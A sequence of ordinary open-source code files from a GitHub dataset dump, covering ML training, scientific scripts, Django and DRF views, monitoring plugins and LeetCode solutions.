model.to(device)\n\n model_without_ddp = model\n\n eff_batch_size = args.batch_size * args.accum_iter * misc.get_world_size()\n\n if args.lr is None: # only base_lr is specified\n args.lr = args.blr * eff_batch_size / 256\n\n print(\"base lr: %.2e\" % (args.lr * 256 / eff_batch_size))\n print(\"actual lr: %.2e\" % args.lr)\n\n print(\"accumulate grad iterations: %d\" % args.accum_iter)\n print(\"effective batch size: %d\" % eff_batch_size)\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[misc.get_rank()], find_unused_parameters=True)\n model_without_ddp = model.module\n\n # following timm: set wd as 0 for bias and norm layers\n param_groups = optim_factory.param_groups_weight_decay(model_without_ddp, args.weight_decay)\n\n #following qlora: apply paged optimizer\n # optimizer = bnb.optim.AdamW32bit(param_groups, lr=args.lr, betas=(0.9, 0.95), is_paged=True) #\n optimizer = torch.optim.AdamW(param_groups, lr=args.lr, betas=(0.9, 0.95))\n print(optimizer)\n\n #mixed precision scaler\n loss_scaler = NativeScaler()\n\n misc.load_model(args=args, model_without_ddp=model_without_ddp, optimizer=optimizer, loss_scaler=loss_scaler)\n\n print(f\"Start training for {args.epochs} epochs\")\n start_time = time.time()\n for epoch in range(args.start_epoch, args.epochs):\n data_loader_train.sampler.set_epoch(epoch)\n\n epoch_time = time.time()\n train_stats = train_one_epoch(model, data_loader_train, optimizer, device, epoch, loss_scaler, log_writer=log_writer, args=args)\n epoch_time = time.time() - epoch_time\n print(\"Epoch time: {}\".format(str(datetime.timedelta(seconds=int(epoch_time)))))\n\n if args.output_dir:\n os.makedirs(args.output_dir, exist_ok=True)\n misc.save_model(args=args, model=model, model_without_ddp=model_without_ddp, optimizer=optimizer, loss_scaler=loss_scaler, epoch=epoch)\n print(\"Saved model and optimizer to {}\".format(args.output_dir))\n torch.distributed.barrier()\n\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n print('Training time {}'.format(total_time_str))\n\n\nif __name__ == '__main__':\n\n args = get_args()\n 
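# get_args() builds the argparse config above; main() does the distributed setup, data loading and the training loop\n    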
main(args)\n","repo_name":"davidnvq/lavin-original","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27355521045","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nimport os, sys, re, logging\n\nimport coloredlogs\n\nfrom metapub import FindIt\n\nlogging.getLogger('eutils').setLevel(logging.INFO)\n\nlogging.getLogger('metapub.findit').setLevel(logging.DEBUG)\n\ncoloredlogs.install()\n\ntry:\n    filename = sys.argv[1]\nexcept IndexError:\n    print(\"supply filename of PMID list as argument to this script\")\n    sys.exit()\n\nre_pmid = re.compile(r'^\\d+$')\ndef validate_pmid(pmid):\n    pmid = pmid.strip()\n    if re_pmid.findall(pmid):\n        return True\n    else:\n        return False\n\npmids = list(set(open(filename, 'r').readlines()))\n\nfor pmid in [item.strip() for item in pmids if validate_pmid(item)]:\n    print(pmid)\n    try:\n        src = FindIt(pmid=pmid, debug=True)\n        print('{src.pmid}\\t{src.doi}\\tScore: {src.doi_score}\\t{src.pma.title}'.format(src=src))\n        if src.url:\n            print(src.url)\n        else:\n            print(src.reason)\n    except Exception as error:\n        print(error)\n\n    print()\n\n\n","repo_name":"metapub/metapub","sub_path":"bin/demo_preload_FindIt.py","file_name":"demo_preload_FindIt.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"35549360578","text":"import numpy as np\r\nimport pandas as pd\r\n\r\ndef getReutersData(validation=True, testOnly=False, testSize=10000):\r\n    from sklearn.datasets import fetch_rcv1\r\n    rcv1 = fetch_rcv1()\r\n    \r\n    train_id_filename = 'C:\\\\Users\\\\SJV (Work)\\\\Desktop\\\\Work\\\\Reuters\\\\rcv1_data\\\\rcv1-1m.id'\r\n    train_id = np.loadtxt(train_id_filename, dtype=np.int64)\r\n    train_index = [np.where(rcv1.sample_id == x)[0][0] for x in train_id]\r\n    X_train = rcv1.data[train_index].toarray()\r\n\r\n    train_label_filename = 'C:\\\\Users\\\\SJV (Work)\\\\Desktop\\\\Work\\\\Reuters\\\\rcv1_data\\\\rcv1-1m.lvl2'\r\n    train_label = np.loadtxt(train_label_filename, dtype='str')\r\n    y_train = np.array([np.where(rcv1.target_names == x)[0][0] for x in train_label])\r\n    \r\n    minFrequency = 2\r\n    freq_cnt = pd.Series(y_train).value_counts(normalize=False)\r\n    unique_train = freq_cnt[freq_cnt >= minFrequency].index\r\n    selected_idx_train = [y_train[i] in unique_train for i in range(len(y_train))]\r\n    X_train = X_train[selected_idx_train]\r\n    y_train = y_train[selected_idx_train]\r\n\r\n    test_id_filename = 'C:\\\\Users\\\\SJV (Work)\\\\Desktop\\\\Work\\\\Reuters\\\\rcv1_data\\\\rcv1-test.id'\r\n    test_id = np.loadtxt(test_id_filename, dtype=np.int64)\r\n    testSize = min(testSize, len(test_id))\r\n    random_test_idx = np.random.choice(range(len(test_id)), size=testSize, replace=False)\r\n    test_index = [np.where(rcv1.sample_id == x)[0][0] for x in test_id[random_test_idx]]\r\n    #test_index = [np.where(rcv1.sample_id == x)[0][0] for x in test_id]\r\n    X_test = rcv1.data[test_index].toarray()\r\n\r\n    test_label_filename = 'C:\\\\Users\\\\SJV (Work)\\\\Desktop\\\\Work\\\\Reuters\\\\rcv1_data\\\\rcv1-test.lvl2'\r\n    test_label = np.loadtxt(test_label_filename, dtype='str')\r\n    y_test = np.array([np.where(rcv1.target_names == x)[0][0] for x in test_label[random_test_idx]])\r\n    #y_test = np.array([np.where(rcv1.target_names == x)[0][0] for x in test_label])\r\n    \r\n    selected_idx = [y_test[i] in unique_train for i in range(len(y_test))]\r\n    
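# keep only test samples whose class survived the minimum-frequency filter applied to the training labels\r\n    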
X_test = X_test[selected_idx]\r\n    y_test = y_test[selected_idx]\r\n    \r\n    y_train = np.asarray([np.where(unique_train == y)[0][0] for y in y_train])\r\n    y_test = np.asarray([np.where(unique_train == y)[0][0] for y in y_test])\r\n    \r\n    if testOnly == True:\r\n        return X_test, y_test\r\n    elif validation == True:\r\n        from sklearn.model_selection import StratifiedShuffleSplit\r\n        sss = StratifiedShuffleSplit(n_splits=1, test_size=2000, random_state=43)\r\n        for train_index, valid_index in sss.split(X_train, y_train):\r\n            X_train, X_valid = X_train[train_index], X_train[valid_index]\r\n            y_train, y_valid = y_train[train_index], y_train[valid_index]\r\n        return X_train, X_test, X_valid, y_train, y_test, y_valid\r\n    else:\r\n        return X_train, X_test, y_train, y_test\r\n\r\nX_train, X_test, X_valid, y_train, y_test, y_valid = getReutersData(testSize=2500)","repo_name":"sjv43/text_classification_reuters_rcv1","sub_path":"RCV1_train_test.py","file_name":"RCV1_train_test.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30115754200","text":"import argparse\nimport math\nfrom prettytable import PrettyTable\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# definition of input variables\nparser = argparse.ArgumentParser(description=\"Program to compute the pressure in a two-segment pipe with different diameters.\")\nparser.add_argument(\"-d1\",\"--diametro1\",type=float, help=\"Diameter of the first segment. (m)\")\nparser.add_argument(\"-d2\",\"--diametro2\",type=float, help=\"Diameter of the second segment. (m)\")\nparser.add_argument(\"-q\",\"--caudal\",type=float, help=\"Flow rate in the pipe. (m^3/s)\")\nparser.add_argument(\"-z1\",\"--altura1\",type=float, help=\"Elevation of segment 1. (m)\")\nparser.add_argument(\"-z2\",\"--altura2\",type=float, help=\"Elevation of segment 2. (m)\")\nparser.add_argument(\"-l1\",\"--longitud1\",type=float, help=\"Length of segment 1. (m)\")\nparser.add_argument(\"-l2\",\"--longitud2\",type=float, help=\"Length of segment 2. 
(m)\")\nargs = parser.parse_args()\n\n# definition of default variables\np1=180*(10**3)\ndensidad=997\ng=9.81\n\n# coefficients of each material\ncoef={\"Pead\":150,\"Polipropileno\":140,\"AceroGalvanizado\":120,\"Concreto\":130}\n\n# area calculation\narea1=math.pi*(args.diametro1**2)/4\narea2=math.pi*(args.diametro2**2)/4\nprint(\"The area of the first segment is: {:10.4f} m^2\".format(area1))\nprint(\"The area of the second segment is: {:10.4f} m^2\\n\".format(area2))\n\n\n# velocity calculation\nv1=args.caudal/area1\nv2=args.caudal/area2\nprint(\"The velocity of the first segment is: {:10.4f} m/s\".format(v1))\nprint(\"The velocity of the second segment is: {:10.4f} m/s\\n\".format(v2))\n\n# first segment\np1pg=(p1/(densidad*g))\nv12g=(0.5*(v1**2)/g)\n\n# second segment\nv22g=(0.5*(v2**2)/g)\n\n# pressure calculation, stored in the results dictionary\nresultados={}\nfor c1 in coef:\n\tfor c2 in coef:\n\t\thf1=args.longitud1*(args.caudal**1.851)/((0.279*coef[c1]*(args.diametro1**2.63)))**1.851\n\t\thf2=args.longitud2*(args.caudal**1.851)/((0.279*coef[c2]*(args.diametro2**2.63)))**1.851\n\t\thftotal=hf2+hf1\n\n\t\tp2=(p1pg+args.altura1+v12g-args.altura2-v22g-hftotal)*densidad*g\n\n\t\tresultados[c1+\"-\"+c2]={\"p2\":p2,\"hf1\":hf1,\"hf2\":hf2,\"deltahf\":hftotal}\n\nprint(\"P2 for the different combinations:\")\n\n\ntabla = PrettyTable(['Combination', 'Pressure 2',\"Hf1\",\"Hf2\",\"DeltaHf\"])\n\nfor key in resultados:\n\ttabla.add_row([key,'{:10.4f}'.format(resultados[key][\"p2\"]),'{:10.4f}'.format(resultados[key][\"hf1\"]),'{:10.4f}'.format(resultados[key][\"hf2\"]),'{:10.4f}'.format(resultados[key][\"deltahf\"])])\nprint(tabla)\n\nx1=[]\ni=0\nwhile i<((int(args.longitud1)*100)+1):\n\tx1.append(int(i))\n\ti+=1\n\nx2=[]\ni=(args.longitud1*100)+20\nwhile i<((int(args.longitud2)*100)+(int(args.longitud1)*100)+21):\n\tx2.append(int(i))\n\ti+=1\n\nx=x1+x2\n\ni=1\nfor key in resultados:\n\n\t# arrays for the plots\n\tz1y=np.array(([args.altura1]*(int(args.longitud1)*100+1))+([args.altura2]*(int(args.longitud2)*100+1)))\n\tppg=np.array(([p1pg]*(int(args.longitud1)*100+1))+([resultados[key][\"p2\"]/(densidad*g)]*(int(args.longitud2)*100+1)))\n\tv2g=np.array(([v12g]*(int(args.longitud1)*100+1))+([v22g]*(int(args.longitud2)*100+1)))\n\thfcon=np.array(([0]*(int(args.longitud1)*100+1))+([resultados[key][\"deltahf\"]]*(int(args.longitud2)*100+1)))\n\n\n\tplt.figure(i)\n\tplt.suptitle(key)\n\tplt.subplot(4,1,1)\n\tplt.title(\"Elevation+P/(p*g)+V/(2*g)+Delta Hf\")\n\tplt.ylabel(\"(m)\")\n\tplt.xlabel(\"Distance from the left end of the pipe. (m)\")\n\tplt.plot(x,z1y+ppg+v2g+hfcon , '-o',markersize=0.1,color=\"blue\")\n\n\tplt.subplot(4,1,2)\n\tplt.title(\"Elevation+P/(p*g)+V/(2*g)\")\n\tplt.ylabel(\"(m)\")\n\tplt.xlabel(\"Distance from the left end of the pipe. (m)\")\n\tplt.plot(x, z1y+ppg+v2g, '-o',markersize=0.1,color=\"green\")\n\n\tplt.subplot(4,1,3)\n\tplt.title(\"Elevation+P/(p*g)\")\n\tplt.ylabel(\"(m)\")\n\tplt.xlabel(\"Distance from the left end of the pipe. (m)\")\n\tplt.plot(x, z1y+ppg, '-o',markersize=0.1,color=\"red\")\n\n\tplt.subplot(4,1,4)\n\tplt.title(\"Elevation\")\n\tplt.ylabel(\"(m)\")\n\tplt.xlabel(\"Distance from the left end of the pipe. 
(m)\")\n\tplt.plot(x, z1y, '-o',markersize=0.1,color=\"brown\")\n\t\n\ti+=1\n\tplt.tight_layout()\nplt.show()\n\n\n\n\n","repo_name":"sasilva1998/pipe_loss","sub_path":"pipeloss.py","file_name":"pipeloss.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22349070526","text":"from typing import List\n\n\nclass Solution:\n    def findMin(self, nums: List[int]) -> int:\n        minimum = float('inf')\n        left, right = 0, len(nums) - 1\n        while left <= right:\n            if nums[left] < nums[right]:\n                minimum = min(minimum, nums[left])\n                break\n            mid = left + (right - left) // 2\n            minimum = min(minimum, nums[mid])\n            # mid in first half\n            if nums[mid] >= nums[left]:\n                left = mid + 1\n            # mid in second half\n            else:\n                right = mid - 1\n        return minimum\n\n## Time Complexity: O(log N)\n## Space Complexity: O(1)","repo_name":"priyanka-asnani/Leetcode-Problems","sub_path":"Binary Search/153. Find Minimum in Rotated Sorted Array.py","file_name":"153. Find Minimum in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23412422202","text":"import logging\nfrom . import pwstaging\n\ndef get_stage_cmd(origin, destination):\n\n    if origin.endswith('/') or destination.endswith('/'):\n        cmd = \"gsutil -m rsync -r {origin} {destination}\"\n    else:\n        cmd = \"gsutil -m cp -r {origin} {destination}\"\n    \n    cmd = cmd.format(\n        origin = origin, \n        destination = destination\n    )\n\n    return cmd\n\n\nclass PWGsutil(pwstaging.PWStaging):\n    \"\"\"\n    This staging provider will execute gsutil on worker nodes\n    to stage in files from a GCP bucket.\n    Worker nodes must be able to authenticate with GCP.\n\n    It will not handle authentication with GCP. 
It assumes the nodes \n are already authenticated.\n \"\"\"\n\n def __init__(self, executor_label, logging_level = logging.INFO):\n self.executor_label = executor_label\n self.logging_level = logging_level\n super().__init__('gs', executor_label, logging_level = logging_level)\n\n def replace_task(self, dm, executor, file, f):\n working_dir = dm.dfk.executors[executor].working_dir\n cmd = get_stage_cmd(origin = file.url, destination = file.local_path)\n cmd_id = self._get_cmd_id(cmd) \n return pwstaging.in_task_stage_in_cmd_wrapper(f, file, working_dir, cmd, cmd_id, self.logger.getEffectiveLevel())\n\n def replace_task_stage_out(self, dm, executor, file, f):\n working_dir = dm.dfk.executors[executor].working_dir\n cmd = get_stage_cmd(origin = file.local_path, destination = file.url)\n cmd_id = self._get_cmd_id(cmd) \n return pwstaging.in_task_stage_out_cmd_wrapper(f, file, working_dir, cmd, cmd_id, self.logger.getEffectiveLevel())\n\n","repo_name":"parallelworks/parsl_utils","sub_path":"data_provider/gsutil.py","file_name":"gsutil.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24353384300","text":"import datetime\nimport os\n\nfrom .cache_manager import save_cache\nfrom ..ControllerUser import ControllerUser\nfrom ..InData import InData\nfrom ..methods import read_script_lines, apply_txt_extension, safe_get_from_dict, safe_get_alias\nfrom ..path_normalizer import normal_path\n\n\nclass Executor(ControllerUser):\n\n def init(self, name=None):\n init(self.controller, name)\n\n def run(self, name=None):\n run(self.controller, name)\n\n def loop(self, name=None):\n loop(self.controller, name)\n\n def list(self):\n list_executions(self.controller)\n\n def show(self, name=None):\n show_execution_content(self.controller, name)\n\n\ndef init(controller, exec_name=None):\n \"\"\"Starts recording a new execution script\"\"\"\n exec_file_name = apply_txt_extension(exec_name or \"current_exec\")\n exec_file_path = os.path.join(controller.container.execution, exec_file_name)\n\n # write lines to run\n current_file = open(exec_file_path, \"w\")\n while True:\n in_data = InData()\n\n if in_data.first in [\"quit\", \"q\", \"end\"]:\n break\n\n if in_data.line:\n current_file.write(in_data.line + \"\\n\")\n\n current_file.close()\n\n # create executions key if not present in cache file\n if not safe_get_from_dict(controller.data.cache, \"executions\"):\n controller.data.cache[\"executions\"] = {}\n\n # add new key to executions\n safe_get_from_dict(controller.data.cache, \"executions\")[exec_name] = apply_txt_extension(exec_name)\n\n save_cache(controller)\n\n\ndef run(controller, name=None):\n \"\"\"Execute default script or script with name\"\"\"\n exec_file_path = get_exec_file_path(controller, name, \"current_exec\")\n if not exec_file_path:\n return\n\n script_lines = read_script_lines(exec_file_path)\n if not script_lines:\n print(\"no script lines in %s\" % exec_file_path)\n return\n\n controller.checker.run_script_lines(script_lines)\n\n\ndef loop(controller, name=None):\n \"\"\"Execute in loop default script or script with name\"\"\"\n exec_file_path = get_exec_file_path(controller, name, \"current_exec\")\n if not exec_file_path:\n return\n\n script_lines = read_script_lines(exec_file_path)\n if not script_lines:\n print(\"no script lines in %s\" % exec_file_path)\n return\n\n # running script lines\n print(\">>\", \"click enter to execute\", end=' ')\n while True:\n in_data = InData()\n\n 
if in_data.first in [\"quit\", \"q\", \"end\"]:\n print(\">>\", \"exited execution mode loop\")\n break\n\n # print(\"running scipt\", \"--\", datetime.datetime.now())\n print(\">>\", \"run\", datetime.datetime.now())\n controller.checker.run_script_lines(script_lines)\n\n\ndef show_execution_content(controller, execution_name=None):\n exec_file_path = get_exec_file_path(controller, execution_name, \"current_exec\")\n if not exec_file_path:\n return\n\n with open(exec_file_path) as f:\n lines = f.readlines()\n lines = [line.rstrip() for line in lines]\n\n if not lines:\n print(\"nothing to show\")\n return\n\n for line in lines:\n print(line)\n\n\ndef list_executions(controller):\n executions_map = safe_get_from_dict(controller.data.cache, \"executions\")\n if not executions_map:\n print(\"cannot find executions list in cache data\")\n\n print(\"adding an empty list of executions\")\n controller.data.cache[\"executions\"] = {}\n save_cache(controller)\n\n return\n\n print(\"\", \"executions:\", list(executions_map.keys()))\n\n\ndef get_exec_file_path(controller, name, current_exec):\n \"\"\"Gets the execution or the default file path\"\"\"\n exec_name = safe_get_alias(controller.cache_data, \"executions\", name) if name else current_exec\n if not exec_name:\n print(\"no executions with %s name in cache data\" % name)\n return None\n\n exec_file_path = os.path.join(controller.container.execution, apply_txt_extension(exec_name))\n if not normal_path(exec_file_path) or not normal_path(exec_file_path).exists():\n print(\"no execution files with %s name in cache archive\" % exec_name)\n return None\n\n return exec_file_path","repo_name":"Antond0c/metafolder","sub_path":"control/utils/services/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70678872542","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.views import generic\nfrom django.urls import reverse\nfrom .func import *\nfrom .models import *\n\n# Create your views here.\n\ndef instructor_home(request):\n\n user = request.user\n if(not user.is_authenticated):\n return redirect('/accounts/login')\n if(user.groups.filter(name='Administration').exists()):\n return redirect('/univ/')\n if(user.groups.filter(name='Student').exists()):\n return redirect('/stud/')\n\n if request.method == \"POST\":\n\n if 'sec_query' in request.POST:\n sem = (int)(request.POST.get('semester'))\n name = (str)(request.POST.get('name'))\n return redirect(reverse('instr:sections_view', kwargs={'sem' : sem, 'name' : name}))\n elif 'stud_query' in request.POST:\n cour = (str)(request.POST.get('course'))\n sec = (str)(request.POST.get('section'))\n sem = (int)(request.POST.get('semester2'))\n yr = (int)(request.POST.get('year'))\n return redirect(reverse('instr:student_view', kwargs={'cour' : cour, 'sec' : sec, 'sem' : sem, 'yr' : yr}))\n\n username = request.user.username\n usertype = 'instructor'\n template_name = 'instructor_home.html'\n return render(request, template_name, {'username': username, 'usertype': usertype})\n\ndef sections_view(request, sem, name):\n\n user = request.user\n if(not user.is_authenticated):\n return redirect('/accounts/login')\n if(user.groups.filter(name='Administration').exists()):\n return redirect('/univ/')\n if(user.groups.filter(name='Student').exists()):\n return redirect('/stud/')\n\n template_name = 'sections_view.html'\n usertype = 
'instructor'\n section_list = sections_by_prof(sem, name)\n return render(request, template_name, {'section_list' : section_list, 'usertype' : usertype})\n\ndef student_view(request, cour, sec, sem, yr):\n\n user = request.user\n if(not user.is_authenticated):\n return redirect('/accounts/login')\n if(user.groups.filter(name='Administration').exists()):\n return redirect('/univ/')\n if(user.groups.filter(name='Student').exists()):\n return redirect('/stud/')\n\n template_name = 'student_view.html'\n usertype = 'instructor'\n student_list = students_by_section(cour, sec, sem, yr)\n return render(request, template_name, {'student_list' : student_list, 'usertype' : usertype})","repo_name":"Caerii/cs460-backend-webapp","sub_path":"Univ_application/instr/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"20290150055","text":"class Solution(object):\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n # find the pivot\n left, right = 0, len(nums) - 1\n\n while left < right:\n mid = left + (right - left) // 2\n if nums[mid] >= nums[right]:\n left = mid + 1\n else:\n right = mid\n\n # if the number is within pivot and right, search in this interval\n if nums[left] <= target <= nums[len(nums) - 1]:\n start, end = left, len(nums) - 1\n else:\n # otherwise, serach in other interval\n start, end = 0, left - 1\n\n # conduct regular binary search\n while start <= end:\n mid = start + (end - start) // 2\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n end = mid - 1\n else:\n start = mid + 1\n\n return -1\n","repo_name":"h74zhou/leetcode","sub_path":"Medium/33. Search in Rotated Sorted Array.py","file_name":"33. Search in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71040226783","text":"import logging\nimport os\nimport tempfile\nimport unittest\nimport ethereum.keys\nimport shutil\nfrom time import sleep\nfrom pathlib import Path\nfrom golem.core.common import is_windows, is_osx\nfrom golem.core.simpleenv import get_local_datadir\n\nlogger = logging.getLogger(__name__)\n\n\nclass TempDirFixture(unittest.TestCase):\n root_dir = None\n\n @classmethod\n def setUpClass(cls):\n logging.basicConfig(level=logging.DEBUG)\n if cls.root_dir is None:\n if is_osx():\n # Use Golem's working directory in ~/Library/Application Support\n # to avoid issues with mounting directories in Docker containers\n cls.root_dir = os.path.join(get_local_datadir('tests'))\n os.makedirs(cls.root_dir, exist_ok=True)\n else:\n # Select nice root temp dir exactly once.\n cls.root_dir = tempfile.mkdtemp(prefix='golem-tests-')\n if is_windows():\n import win32api\n cls.root_dir = win32api.GetLongPathName(cls.root_dir)\n\n # Concurrent tests will fail\n # @classmethod\n # def tearDownClass(cls):\n # if os.path.exists(cls.root_dir):\n # shutil.rmtree(cls.root_dir)\n\n def setUp(self):\n\n # KeysAuth uses it. 
Default val (250k+) slows down the tests terribly\n ethereum.keys.PBKDF2_CONSTANTS['c'] = 1\n\n prefix = self.id().rsplit('.', 1)[1] # Use test method name\n self.tempdir = tempfile.mkdtemp(prefix=prefix, dir=self.root_dir)\n self.path = self.tempdir # Alias for legacy tests\n if not is_windows():\n os.chmod(self.tempdir, 0o770)\n self.new_path = Path(self.path)\n\n def tearDown(self):\n # Firstly kill Ethereum node to clean up after it later on.\n try:\n self.__remove_files()\n except OSError as e:\n logger.debug(\"%r\", e, exc_info=True)\n tree = ''\n for path, dirs, files in os.walk(self.path):\n tree += path + '\\n'\n for f in files:\n tree += f + '\\n'\n logger.error(\"Failed to remove files %r\", tree)\n # Tie up loose ends.\n import gc\n gc.collect()\n # On windows there's sometimes a problem with syncing all threads.\n # Try again after 3 seconds\n sleep(3)\n self.__remove_files()\n\n def temp_file_name(self, name: str) -> str:\n return os.path.join(self.tempdir, name)\n\n def additional_dir_content(self, file_num_list, dir_=None, results=None,\n sub_dir=None):\n \"\"\"\n Create recursively additional temporary files in directories in given\n directory.\n For example file_num_list in format [5, [2], [4, []]] will create\n 5 files in self.tempdir directory, and 2 subdirectories - first one will\n contain 2 tempfiles, second will contain 4 tempfiles and an empty\n subdirectory.\n :param file_num_list: list containing number of new files that should\n be created in this directory or list describing file_num_list for\n new inner directories\n :param dir_: directory in which files should be created\n :param results: list of created temporary files\n :return:\n \"\"\"\n if dir_ is None:\n dir_ = self.tempdir\n if sub_dir:\n dir_ = os.path.join(dir_, sub_dir)\n if not os.path.exists(dir_):\n os.makedirs(dir_)\n if results is None:\n results = []\n for el in file_num_list:\n if isinstance(el, int):\n for i in range(el):\n t = tempfile.NamedTemporaryFile(dir=dir_, delete=False)\n results.append(t.name)\n else:\n new_dir = tempfile.mkdtemp(dir=dir_)\n self.additional_dir_content(el, new_dir, results)\n return results\n\n def __remove_files(self):\n if os.path.isdir(self.tempdir):\n shutil.rmtree(self.tempdir)","repo_name":"golemfactory/clay","sub_path":"tests/golem/verifier/test_utils/temp_dir_fixture.py","file_name":"temp_dir_fixture.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":2915,"dataset":"github-code","pt":"7"} +{"seq_id":"20313246396","text":"import urllib.request\nimport urllib.parse\nimport json\nimport html\n\ndef translate(bot, args):\n\tif len(args) > 2:\n\t\tif \"|\" not in args[1]:\n\t\t\treturn \"Usage: !%s \" % args[0]\n\t\tlang_from, lang_to = args[1].split(\"|\")\n\t\tquery = ' '.join(args[2:])\n\t\tdata = json.load(urllib.request.urlopen('https://www.googleapis.com/language/translate/v2?%s' % urllib.parse.urlencode({'key': bot.config.get('module: translate', 'api_key'), 'q': query, 'source': lang_from, 'target': lang_to}), timeout = 5))\n\t\ttry:\n\t\t\tresponse = html.unescape(data['data']['translations'][0]['translatedText'])\n\t\t\treturn response\n\t\texcept ValueError:\n\t\t\treturn '!%s: le derp' % args[0]\n\telse:\n\t\treturn \"Usage: !%s \" % args[0]\n","repo_name":"milosivanovic/xbot","sub_path":"xbot/modules/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} 
+{"seq_id":"15459060602","text":"from sauna.plugins import Plugin, human_to_bytes, bytes_to_human,\\\n PluginRegister\n\nmy_plugin = PluginRegister('Disque')\n\n\n@my_plugin.plugin()\nclass Disque(Plugin):\n\n def __init__(self, config):\n super().__init__(config)\n try:\n import redis\n self.redis = redis\n except ImportError:\n from ... import DependencyError\n raise DependencyError(self.__class__.__name__, 'redis-py',\n 'redis', 'python3-redis')\n self._disque_info = None\n\n @my_plugin.check()\n def used_memory(self, check_config):\n status = self._value_to_status_less(\n self.disque_info['used_memory'], check_config, human_to_bytes\n )\n output = 'Used memory: {}'.format(\n self.disque_info['used_memory_human'])\n return status, output\n\n @my_plugin.check()\n def used_memory_rss(self, check_config):\n status = self._value_to_status_less(\n self.disque_info['used_memory_rss'], check_config, human_to_bytes\n )\n output = 'Used memory RSS: {}'.format(\n bytes_to_human(self.disque_info['used_memory_rss'])\n )\n return status, output\n\n @property\n def disque_info(self):\n if not self._disque_info:\n r = self.redis.StrictRedis(**self.config)\n self._disque_info = r.info()\n return self._disque_info\n\n @my_plugin.check()\n def qlen(self, check_config):\n r = self.redis.StrictRedis(**self.config)\n num_items = r.execute_command('QLEN', check_config['key'])\n status = self._value_to_status_less(num_items, check_config)\n output = '{} items in key {}'.format(num_items, check_config['key'])\n return status, output\n\n @staticmethod\n def config_sample():\n return '''\n # Disque, an in-memory, distributed job queue\n # This is a Redis fork, https://github.com/antirez/disque\n - type: Disque\n checks:\n - type: used_memory\n warn: 128M\n crit: 1024M\n - type: used_memory_rss\n warn: 128M\n crit: 1024M\n # Check the size of a queue\n - type: qlen\n key: my-queue\n warn: 10\n crit: 20\n config:\n host: localhost\n port: 7711\n '''\n","repo_name":"NicolasLM/sauna","sub_path":"sauna/plugins/ext/disque.py","file_name":"disque.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"7"} +{"seq_id":"26549618565","text":"from rest_framework.response import Response\nfrom ..serializers import PutAuthorSerializer, AuthorInfo\nfrom ..swagger import token_param\nfrom ..common import *\nfrom drf_yasg.utils import swagger_auto_schema\nfrom rest_framework import serializers\nfrom django.db.utils import IntegrityError\nfrom rest_framework.exceptions import NotFound\nimport logging as log\nfrom ..permissions import ReadOnlyPermission\nfrom .viewset import CRUDViewSet\n\n\nclass AuthorsViewSet(CRUDViewSet):\n queryset = Author.objects.all()\n serializer_class = AuthorInfo\n permission_classes = [ReadOnlyPermission]\n pagination_class = PaginationClass\n\n def get_serializer_class(self):\n if self.action == \"create\":\n return PutAuthorSerializer\n else:\n return self.serializer_class\n\n @swagger_auto_schema(\n operation_description=\"Get list of authors\",\n responses={200: AuthorInfo, \"other\": \"something went wrong\"},\n )\n def list(self, request, *args, **kwargs):\n return super().list(request, *args, **kwargs)\n\n @swagger_auto_schema(\n operation_description=\"Create author\",\n responses={201: \"successful\", \"other\": \"something went wrong\"},\n request_body=PutAuthorSerializer,\n manual_parameters=[token_param],\n )\n def create(self, request, *args, **kwargs):\n try:\n return super().create(request, *args, 
**kwargs)\n        except serializers.ValidationError as e:\n            log.error(f\"ValidationError: {e}\")\n            return Response(status=500)\n        except IntegrityError as e:\n            if \"FOREIGN KEY constraint failed\" in e.args[0]:\n                log.error(e.args[0])\n                return Response(\"user does not exist\", status=500)\n            log.error(e)\n            return Response(status=404)\n        except Exception as e:\n            log.error(f\"Something went wrong {e}\")\n            return Response(status=404)\n\n    @swagger_auto_schema(\n        operation_description=\"Update author\",\n        responses={200: \"successful\", \"other\": \"something went wrong\"},\n        request_body=AuthorInfo,\n        manual_parameters=[token_param],\n    )\n    def update(self, request, *args, **kwargs):\n        try:\n            return super().update(request, *args, **kwargs)\n        except serializers.ValidationError as e:\n            log.error(f\"ValidationError: {e}\")\n            return Response(status=500)\n        except IntegrityError as e:\n            if \"FOREIGN KEY constraint failed\" in e.args[0]:\n                log.error(e.args[0])\n                return Response(\"user does not exist\", status=403)\n            log.error(f\"IntegrityError {e}\")\n            return Response(status=500)\n        except Author.DoesNotExist:\n            log.error(\"Author doesn't exist\")\n            return 